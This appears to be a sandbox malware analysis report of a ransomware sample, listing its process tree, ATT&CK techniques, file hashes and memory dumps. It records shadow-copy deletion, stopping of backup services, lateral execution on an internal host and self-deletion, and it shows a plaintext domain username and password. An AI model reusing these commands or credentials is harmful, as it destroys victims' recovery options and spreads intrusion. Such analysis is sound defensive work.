  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3808
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5352
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5340
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5332
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5324
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5316
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5308
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5300
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5292
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5284
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5276
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5268
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5260
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5252
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.224 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:4768
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5244
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4500
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:2888
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:1748
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:5044
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:2532
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:1500
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1128
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:1940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:372
- C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe
  "C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe" \10.127.0.224 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:664
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:2320
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:3864
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2740
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:4804
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a3977fd383059a9833f42178061c0038754a19a76891aed5f38f36cd0300f709.exe
  2⤵
  PID:1584
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:1524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5196

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5140

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

File Deletion

Modify Registry

Web Service

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe

Filesize
219KB

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\agfdupi1.exe

Filesize
219KB

MD5
b1dfb4f9eb3e598d1892a3bd3a92f079

SHA1
0fc135b131d0bb47c9a0aaf02490701303b76d3b

SHA256
ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb

SHA512
98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

Filesize
1KB

MD5
622b028a47e66c732ed3f444c150be25

SHA1
344483a5e0bac46ebccbd81959b6b43a0418b5f9

SHA256
029493a8457b69beb472878ded9cb13667b5e0f42e23124c5a7952e6eee0acee

SHA512
86f909326f224bc4221ae29d37618bfab6b6ea82fca634d982bde8386d932239c9f63edaccdb4a1edc5edbb126d133013c95c97fc9882f2accdb73edb061bc91

Download Submit
memory/220-154-0x0000000000000000-mapping.dmp

Download
memory/372-175-0x0000000000000000-mapping.dmp

Download
memory/444-183-0x0000000000000000-mapping.dmp

Download
memory/764-139-0x0000000000000000-mapping.dmp

Download
memory/824-188-0x0000000000000000-mapping.dmp

Download
memory/860-192-0x0000000000000000-mapping.dmp

Download
memory/984-162-0x0000000000000000-mapping.dmp

Download
memory/1044-163-0x0000000000000000-mapping.dmp

Download
memory/1128-179-0x0000000000000000-mapping.dmp

Download
memory/1232-146-0x0000000000000000-mapping.dmp

Download
memory/1380-173-0x0000000000000000-mapping.dmp

Download
memory/1400-164-0x0000000000000000-mapping.dmp

Download
memory/1444-148-0x0000000000000000-mapping.dmp

Download
memory/1500-186-0x0000000000000000-mapping.dmp

Download
memory/1740-184-0x0000000000000000-mapping.dmp

Download
memory/1940-177-0x0000000000000000-mapping.dmp

Download
memory/2080-189-0x0000000000000000-mapping.dmp

Download
memory/2196-158-0x0000000000000000-mapping.dmp

Download
memory/2292-159-0x0000000000000000-mapping.dmp

Download
memory/2320-180-0x0000000000000000-mapping.dmp

Download
memory/2324-155-0x0000000000000000-mapping.dmp

Download
memory/2380-174-0x0000000000000000-mapping.dmp

Download
memory/2532-196-0x0000000000000000-mapping.dmp

Download
memory/2756-149-0x0000000000000000-mapping.dmp

Download
memory/2892-194-0x0000000000000000-mapping.dmp

Download
memory/2904-170-0x0000000000000000-mapping.dmp

Download
memory/2944-147-0x0000000000000000-mapping.dmp

Download
memory/3000-132-0x0000000000000000-mapping.dmp

Download
memory/3000-135-0x00007FFE56B70000-0x00007FFE57631000-memory.dmp

Filesize
10.8MB

Download
memory/3000-134-0x00007FFE56B70000-0x00007FFE57631000-memory.dmp

Filesize
10.8MB

Download
memory/3000-133-0x000001AC1FE70000-0x000001AC1FE92000-memory.dmp

Filesize
136KB

Download
memory/3236-169-0x0000000000000000-mapping.dmp

Download
memory/3252-151-0x0000000000000000-mapping.dmp

Download
memory/3308-160-0x0000000000000000-mapping.dmp

Download
memory/3388-167-0x0000000000000000-mapping.dmp

Download
memory/3532-157-0x0000000000000000-mapping.dmp

Download
memory/3708-156-0x0000000000000000-mapping.dmp

Download
memory/3720-187-0x0000000000000000-mapping.dmp

Download
memory/3760-130-0x0000000000450000-0x000000000046C000-memory.dmp

Filesize
112KB

Download
memory/3760-202-0x00007FFE56B70000-0x00007FFE57631000-memory.dmp

Filesize
10.8MB

Download
memory/3760-131-0x00007FFE56B70000-0x00007FFE57631000-memory.dmp

Filesize
10.8MB

Download
memory/3832-150-0x0000000000000000-mapping.dmp

Download
memory/3848-144-0x0000000000000000-mapping.dmp

Download
memory/3856-190-0x0000000000000000-mapping.dmp

Download
memory/3888-168-0x0000000000000000-mapping.dmp

Download
memory/4056-165-0x0000000000000000-mapping.dmp

Download
memory/4140-137-0x0000000000000000-mapping.dmp

Download
memory/4296-182-0x0000000000000000-mapping.dmp

Download
memory/4308-152-0x0000000000000000-mapping.dmp

Download
memory/4316-185-0x0000000000000000-mapping.dmp

Download
memory/4348-191-0x0000000000000000-mapping.dmp

Download
memory/4416-143-0x0000000000000000-mapping.dmp

Download
memory/4460-142-0x0000000000000000-mapping.dmp

Download
memory/4492-197-0x0000000000000000-mapping.dmp

Download
memory/4520-198-0x0000000000000000-mapping.dmp

Download
memory/4568-141-0x0000000000000000-mapping.dmp

Download
memory/4584-140-0x0000000000000000-mapping.dmp

Download
memory/4592-136-0x0000000000000000-mapping.dmp

Download
memory/4708-176-0x0000000000000000-mapping.dmp

Download
memory/4812-171-0x0000000000000000-mapping.dmp

Download
memory/4820-195-0x0000000000000000-mapping.dmp

Download
memory/4824-138-0x0000000000000000-mapping.dmp

Download
memory/4860-181-0x0000000000000000-mapping.dmp

Download
memory/4864-161-0x0000000000000000-mapping.dmp

Download
memory/4876-166-0x0000000000000000-mapping.dmp

Download
memory/4960-145-0x0000000000000000-mapping.dmp

Download
memory/4964-178-0x0000000000000000-mapping.dmp

Download
memory/5000-153-0x0000000000000000-mapping.dmp

Download
memory/5048-172-0x0000000000000000-mapping.dmp

Download
memory/5064-193-0x0000000000000000-mapping.dmp

Download